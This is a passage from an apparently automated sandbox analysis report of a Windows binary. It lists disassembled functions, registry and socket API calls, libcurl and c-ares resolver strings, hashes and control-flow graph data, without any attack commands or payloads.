                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28561495f696fb9bd6b924be0416ccfe228d2e0052ee1189686cacfea790a5bd
                                                          • Instruction ID: 6519a82ea6e7d82cb89988af95840b85598a3ac644472d2b504323a715d621f4
                                                          • Opcode Fuzzy Hash: 28561495f696fb9bd6b924be0416ccfe228d2e0052ee1189686cacfea790a5bd
                                                          • Instruction Fuzzy Hash: 9E9124306AC74A4BD7358E29A8947BB72D5EFC4321F148B2CEC99871D0EB709C68D685
                                                          Function 0030A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,002F712E,?,?,?,00001001,00000000), ref: 0030A90C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: recvfrom
                                                          • String ID:
                                                          • API String ID: 846543921-0
                                                          • Opcode ID: 6021b44333efb118ad0a4e6b17df5e90c846ac296bcdffb823077c98af32dcc6
                                                          • Instruction ID: aeb82fcfb9736b89d41253a63ffdcf09a0156dcab57b58342b58e527ea624ab9
                                                          • Opcode Fuzzy Hash: 6021b44333efb118ad0a4e6b17df5e90c846ac296bcdffb823077c98af32dcc6
                                                          • Instruction Fuzzy Hash: 3EF06D7520930CAFD2209F01EC44D6BBBEDEFC9754F05456DF948232118370AE10DAB2
                                                          Function 002FA440 Relevance: 62.3, APIs: 22, Strings: 13, Instructions: 1066registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 002FA499
                                                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 002FA4FB
                                                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 002FA531
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 002FAA19
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 002FAA4C
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 002FAA97
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 002FAAE9
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 002FAB30
                                                          • RegCloseKey.KERNELBASE(?), ref: 002FAB6A
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 002FAB82
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 002FAC46
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 002FAD0A
                                                          • RegEnumKeyExA.KERNELBASE ref: 002FAD8D
                                                          • RegCloseKey.KERNELBASE(?), ref: 002FADD9
                                                          • RegEnumKeyExA.KERNELBASE ref: 002FAE08
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 002FAE2A
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 002FAE54
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 002FAF63
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 002FAFB2
                                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 002FB072
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                          • String ID: ;z~$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$XLm$\Lm$`Lm$cx~
                                                          • API String ID: 4281207131-260609020
                                                          • Opcode ID: ee00fd2f40930d9e5017b4c48d2198e1b7ff91e2c15c676b8392199bef4cf215
                                                          • Instruction ID: 88f929109c8a3b25366618ee832c209699b36c961e23776beb6314fe912e9745
                                                          • Opcode Fuzzy Hash: ee00fd2f40930d9e5017b4c48d2198e1b7ff91e2c15c676b8392199bef4cf215
                                                          • Instruction Fuzzy Hash: F072D1B1618306AFE3109F24CC85B6BB7E8AF85780F144838FA89D7291E775E954CB53
                                                          Function 0027A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0027A832
                                                          Strings
                                                          • Could not set TCP_NODELAY: %s, xrefs: 0027A871
                                                          • cf_socket_open() -> %d, fd=%d, xrefs: 0027A796
                                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0027A6CE
                                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0027AD0A
                                                          • Local Interface %s is ip %s using address family %i, xrefs: 0027AE60
                                                          • @, xrefs: 0027AC42
                                                          • Local port: %hu, xrefs: 0027AF28
                                                          • Trying %s:%d..., xrefs: 0027A7C2, 0027A7DE
                                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0027ADAC
                                                          • @, xrefs: 0027A8F4
                                                          • cf-socket.c, xrefs: 0027A5CD, 0027A735
                                                          • Trying [%s]:%d..., xrefs: 0027A689
                                                          • Bind to local port %d failed, trying next, xrefs: 0027AFE5
                                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0027AE1F
                                                          • bind failed with errno %d: %s, xrefs: 0027B080
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: setsockopt
                                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3981526788-2373386790
                                                          • Opcode ID: f224fec7991b8f5d5fd91e41613ffa678eb868687bbab43090834133fbd3ac8c
                                                          • Instruction ID: f9bf6bb695c3d60d608427a71d8b1dda2acaaa197ff1e08d83b79228dedcb62d
                                                          • Opcode Fuzzy Hash: f224fec7991b8f5d5fd91e41613ffa678eb868687bbab43090834133fbd3ac8c
                                                          • Instruction Fuzzy Hash: 3562E571518342ABE7218F14C846BAFB7E4BFD1324F04891DF98C97292E771A964CB93
                                                          Function 00309740 Relevance: 20.0, APIs: 3, Strings: 8, Instructions: 743registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 851 309740-30975b 852 309780-309782 851->852 853 30975d-309768 call 3078a0 851->853 855 309914-30994e call 5c8b70 RegOpenKeyExA 852->855 856 309788-3097a0 call 5c8e00 call 3078a0 852->856 861 3099bb-3099c0 853->861 862 30976e-309770 853->862 864 309950-309955 855->864 865 30995a-309992 RegQueryValueExA RegCloseKey call 5c8b98 855->865 856->861 867 3097a6-3097c5 856->867 868 309a0c-309a15 861->868 866 309772-30977e 862->866 862->867 864->868 879 309997-3099b5 call 3078a0 865->879 866->856 874 309827-309833 867->874 875 3097c7-3097e0 867->875 880 309835-30985c call 2fe2b0 * 2 874->880 881 30985f-309872 call 305ca0 874->881 877 3097e2-3097f3 call 5c8b50 875->877 878 3097f6-309809 875->878 877->878 878->874 891 30980b-309810 878->891 879->861 879->867 880->881 892 3099f0 881->892 893 309878-30987d call 3077b0 881->893 891->874 896 309812-309822 891->896 895 3099f5-3099fb call 305d00 892->895 900 309882-309889 893->900 905 3099fe-309a09 895->905 896->868 900->895 904 30988f-30989b call 2f4fe0 900->904 904->892 909 3098a1-3098c3 call 5c8b50 call 3078a0 904->909 905->868 915 3099c2-3099ed call 2fe2b0 * 2 909->915 916 3098c9-3098db call 2fe2d0 909->916 915->892 916->915 920 3098e1-3098f0 call 2fe2d0 916->920 920->915 927 3098f6-309905 call 3063f0 920->927 931 309f66-309f7f call 305d00 927->931 932 30990b-30990f 927->932 931->905 933 309a3f-309a5a call 306740 call 3063f0 932->933 933->931 940 309a60-309a6e call 306d60 933->940 943 309a70-309a94 call 306200 call 3067e0 call 306320 940->943 944 309a1f-309a39 call 306840 call 3063f0 940->944 955 309a16-309a19 943->955 956 309a96-309ac6 call 2fd120 943->956 944->931 944->933 955->944 958 309fc1 955->958 961 309ae1-309af7 call 2fd190 956->961 962 309ac8-309adb call 2fd120 956->962 960 309fc5-309ffd call 305d00 call 2fe2b0 * 2 958->960 960->905 961->944 970 309afd-309b09 call 2f4fe0 961->970 962->944 962->961 970->958 976 309b0f-309b29 call 2fe730 970->976 980 309f84-309f88 976->980 981 309b2f-309b3a call 3078a0 976->981 984 309f95-309f99 980->984 981->980 988 309b40-309b54 call 2fe760 981->988 986 309fa0-309fb6 call 2febf0 * 2 984->986 987 309f9b-309f9e 984->987 998 309fb7-309fbe 986->998 987->958 987->986 994 309f8a-309f92 988->994 995 309b5a-309b6e call 2fe730 988->995 994->984 1001 309b70-30a004 995->1001 1002 309b8c-309b97 call 3063f0 995->1002 998->958 1007 30a015-30a01d 1001->1007 1008 309c9a-309cab call 2fea00 1002->1008 1009 309b9d-309bbf call 306740 call 3063f0 1002->1009 1010 30a024-30a045 call 2febf0 * 2 1007->1010 1011 30a01f-30a022 1007->1011 1020 309f31-309f35 1008->1020 1021 309cb1-309ccd call 2fea00 call 2fe960 1008->1021 1009->1008 1028 309bc5-309bda call 306d60 1009->1028 1010->960 1011->960 1011->1010 1023 309f40-309f61 call 2febf0 * 2 1020->1023 1024 309f37-309f3a 1020->1024 1039 309cfd-309d0e call 2fe960 1021->1039 1040 309ccf 1021->1040 1023->944 1024->944 1024->1023 1028->1008 1038 309be0-309bf4 call 306200 call 3067e0 1028->1038 1038->1008 1059 309bfa-309c0b call 306320 1038->1059 1049 309d10 1039->1049 1050 309d53-309d55 1039->1050 1041 309cd1-309cec call 2fe9f0 call 2fe4a0 1040->1041 1060 309d47-309d51 1041->1060 1061 309cee-309cfb call 2fe9d0 1041->1061 1054 309d12-309d2d call 2fe9f0 call 2fe4a0 1049->1054 1053 309e69-309e8e call 2fea40 call 2fe440 1050->1053 1079 309e90-309e92 1053->1079 1080 309e94-309eaa call 2fe3c0 1053->1080 1076 309d5a-309d6f call 2fe960 1054->1076 1077 309d2f-309d3c call 2fe9d0 1054->1077 1071 309c11-309c1c call 307b70 1059->1071 1072 309b75-309b86 call 2fea00 1059->1072 1066 309dca-309ddb call 2fe960 1060->1066 1061->1039 1061->1041 1089 309ddd-309ddf 1066->1089 1090 309e2e-309e36 1066->1090 1071->1002 1093 309c22-309c33 call 2fe960 1071->1093 1072->1002 1098 309f2d 1072->1098 1104 309d71-309d73 1076->1104 1105 309dc2 1076->1105 1077->1054 1101 309d3e-309d42 1077->1101 1086 309eb3-309ec4 call 2fe9c0 1079->1086 1108 309eb0-309eb1 1080->1108 1109 30a04a-30a04c 1080->1109 1086->944 1111 309eca-309ed0 1086->1111 1099 309e06-309e21 call 2fe9f0 call 2fe4a0 1089->1099 1095 309e38-309e3b 1090->1095 1096 309e3d-309e5b call 2febf0 * 2 1090->1096 1120 309c35 1093->1120 1121 309c66-309c75 call 3078a0 1093->1121 1095->1096 1106 309e5e-309e67 1095->1106 1096->1106 1098->1020 1135 309de1-309dee call 2fec80 1099->1135 1136 309e23-309e2c call 2feac0 1099->1136 1101->1053 1116 309d9a-309db5 call 2fe9f0 call 2fe4a0 1104->1116 1105->1066 1106->1053 1106->1086 1108->1086 1114 30a057-30a070 call 2febf0 * 2 1109->1114 1115 30a04e-30a051 1109->1115 1119 309ee5-309ef2 call 2fe9f0 1111->1119 1114->998 1115->958 1115->1114 1149 309d75-309d82 call 2fec80 1116->1149 1150 309db7-309dc0 call 2feac0 1116->1150 1119->944 1142 309ef8-309f0e call 2fe440 1119->1142 1128 309c37-309c51 call 2fe9f0 1120->1128 1138 30a011 1121->1138 1139 309c7b-309c8f call 2fe7c0 1121->1139 1128->1002 1165 309c57-309c64 call 2fe9d0 1128->1165 1153 309df1-309e04 call 2fe960 1135->1153 1136->1153 1138->1007 1139->1002 1160 309c95-30a00e 1139->1160 1163 309f10-309f26 call 2fe3c0 1142->1163 1164 309ed2-309edf call 2fe9e0 1142->1164 1169 309d85-309d98 call 2fe960 1149->1169 1150->1169 1153->1090 1153->1099 1160->1138 1163->1164 1177 309f28 1163->1177 1164->944 1164->1119 1165->1121 1165->1128 1169->1105 1169->1116 1177->958
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00309946
                                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00309974
                                                          • RegCloseKey.KERNELBASE(?), ref: 0030998B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$`Lm$sts
                                                          • API String ID: 3677997916-3832176339
                                                          • Opcode ID: c2faf3dc3dda873c77510b28386c5258949f8567a41ed0fe85e00fbc0c5d1ee2
                                                          • Instruction ID: 93899871f1f6056de12ad8a53b837ecf0698740c8260c4adf4ef9524c8f01f46
                                                          • Opcode Fuzzy Hash: c2faf3dc3dda873c77510b28386c5258949f8567a41ed0fe85e00fbc0c5d1ee2
                                                          • Instruction Fuzzy Hash: 3132F6F59052016BEB12AB24EC52B2BB6D9AF44344F0A4435FD09972A3F731ED24DB93
                                                          Function 00278B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1259 278b50-278b69 1260 278be6 1259->1260 1261 278b6b-278b74 1259->1261 1262 278be9 1260->1262 1263 278b76-278b8d 1261->1263 1264 278beb-278bf2 1261->1264 1262->1264 1265 278bf3-278bfe call 27a550 1263->1265 1266 278b8f-278ba7 call 256e40 1263->1266 1271 278de4-278def 1265->1271 1272 278c04-278c08 1265->1272 1273 278bad-278baf 1266->1273 1274 278cd9-278d16 SleepEx getsockopt 1266->1274 1275 278df5-278e19 call 27a150 1271->1275 1276 278e8c-278e95 1271->1276 1277 278c0e-278c1d 1272->1277 1278 278dbd-278dc3 1272->1278 1279 278ca6-278cb0 1273->1279 1280 278bb5-278bb9 1273->1280 1281 278d22 1274->1281 1282 278d18-278d20 1274->1282 1318 278e1b-278e26 1275->1318 1319 278e88 1275->1319 1284 278e97-278e9c 1276->1284 1285 278f00-278f06 1276->1285 1287 278c35-278c48 call 27a150 1277->1287 1288 278c1f-278c30 connect 1277->1288 1278->1262 1279->1274 1289 278cb2-278cb8 1279->1289 1280->1264 1290 278bbb-278bc2 1280->1290 1283 278d26-278d39 1281->1283 1282->1283 1292 278d43-278d61 call 25d8c0 call 27a150 1283->1292 1293 278d3b-278d3d 1283->1293 1294 278edf-278eef call 2478b0 1284->1294 1295 278e9e-278eb6 call 252a00 1284->1295 1285->1264 1320 278c4d-278c4f 1287->1320 1288->1287 1297 278cbe-278cd4 call 27b180 1289->1297 1298 278ddc-278dde 1289->1298 1290->1264 1299 278bc4-278bcc 1290->1299 1322 278d66-278d74 1292->1322 1293->1292 1293->1298 1315 278ef2-278efc 1294->1315 1295->1294 1317 278eb8-278edd call 253410 * 2 1295->1317 1297->1271 1298->1262 1298->1271 1305 278bd4-278bda 1299->1305 1306 278bce-278bd2 1299->1306 1305->1264 1307 278bdc-278be1 1305->1307 1306->1264 1306->1305 1314 278dac-278db8 call 2850a0 1307->1314 1314->1264 1315->1285 1317->1315 1324 278e2e-278e85 call 25d090 call 284fd0 1318->1324 1325 278e28-278e2c 1318->1325 1319->1276 1326 278c51-278c58 1320->1326 1327 278c8e-278c93 1320->1327 1322->1264 1333 278d7a-278d81 1322->1333 1324->1319 1325->1319 1325->1324 1326->1327 1329 278c5a-278c62 1326->1329 1331 278c99-278c9f 1327->1331 1332 278dc8-278dd9 call 27b100 1327->1332 1336 278c64-278c68 1329->1336 1337 278c6a-278c70 1329->1337 1331->1279 1332->1298 1333->1264 1339 278d87-278d8f 1333->1339 1336->1327 1336->1337 1337->1327 1341 278c72-278c8b call 2850a0 1337->1341 1343 278d91-278d95 1339->1343 1344 278d9b-278da1 1339->1344 1341->1327 1343->1264 1343->1344 1344->1264 1348 278da7 1344->1348 1348->1314
                                                          APIs
                                                          • connect.WS2_32(?,?,00000001), ref: 00278C30
                                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00278CF3
                                                          • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00278D0F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: Sleepconnectgetsockopt
                                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                          • API String ID: 1669343778-879669977
                                                          • Opcode ID: 0355f42b985fbe60b308ab19b824d2b180fc677479a97d1dde375f21d469ac56
                                                          • Instruction ID: 991c539817d3bc8d537830eb390214130bc6a3b879038579c286765b2fc58a5f
                                                          • Opcode Fuzzy Hash: 0355f42b985fbe60b308ab19b824d2b180fc677479a97d1dde375f21d469ac56
                                                          • Instruction Fuzzy Hash: 83B1A1706543069FD724CF24C889B66B7A0AF45318F04C52DE85D9B2D2EB70E864CB62
                                                          Function 0030AA30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 377networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1445 30aa30-30aa64 1447 30ab04-30ab09 1445->1447 1448 30aa6a-30aaa7 call 2fe730 1445->1448 1449 30ae80-30ae89 1447->1449 1452 30aaa9-30aabd 1448->1452 1453 30ab0e-30ab13 1448->1453 1455 30ab18-30ab50 1452->1455 1456 30aabf-30aac7 1452->1456 1454 30ae2e 1453->1454 1458 30ae30-30ae4a call 2fea60 call 2febf0 1454->1458 1462 30ab58-30ab6d 1455->1462 1456->1454 1457 30aacd-30ab02 1456->1457 1457->1462 1472 30ae75-30ae7d 1458->1472 1473 30ae4c-30ae57 1458->1473 1464 30ab96-30abab socket 1462->1464 1465 30ab6f-30ab73 1462->1465 1464->1454 1469 30abb1-30abc5 1464->1469 1465->1464 1467 30ab75-30ab8f 1465->1467 1467->1469 1486 30ab91 1467->1486 1470 30abd0-30abed ioctlsocket 1469->1470 1471 30abc7-30abca 1469->1471 1475 30ac10-30ac14 1470->1475 1476 30abef-30ac0a 1470->1476 1471->1470 1474 30ad2e-30ad39 1471->1474 1472->1449 1478 30ae59-30ae5e 1473->1478 1479 30ae6e-30ae6f 1473->1479 1484 30ad52-30ad56 1474->1484 1485 30ad3b-30ad4c 1474->1485 1481 30ac16-30ac31 1475->1481 1482 30ac37-30ac41 1475->1482 1476->1475 1487 30ae29 1476->1487 1478->1479 1480 30ae60-30ae6c 1478->1480 1479->1472 1480->1472 1481->1482 1481->1487 1490 30ac43-30ac46 1482->1490 1491 30ac7a-30ac7e 1482->1491 1484->1487 1488 30ad5c-30ad6b 1484->1488 1485->1484 1485->1487 1486->1454 1487->1454 1495 